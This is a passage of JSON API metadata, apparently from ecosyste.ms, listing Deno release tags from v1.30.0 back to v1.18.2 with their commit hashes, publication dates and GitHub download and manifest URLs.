api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e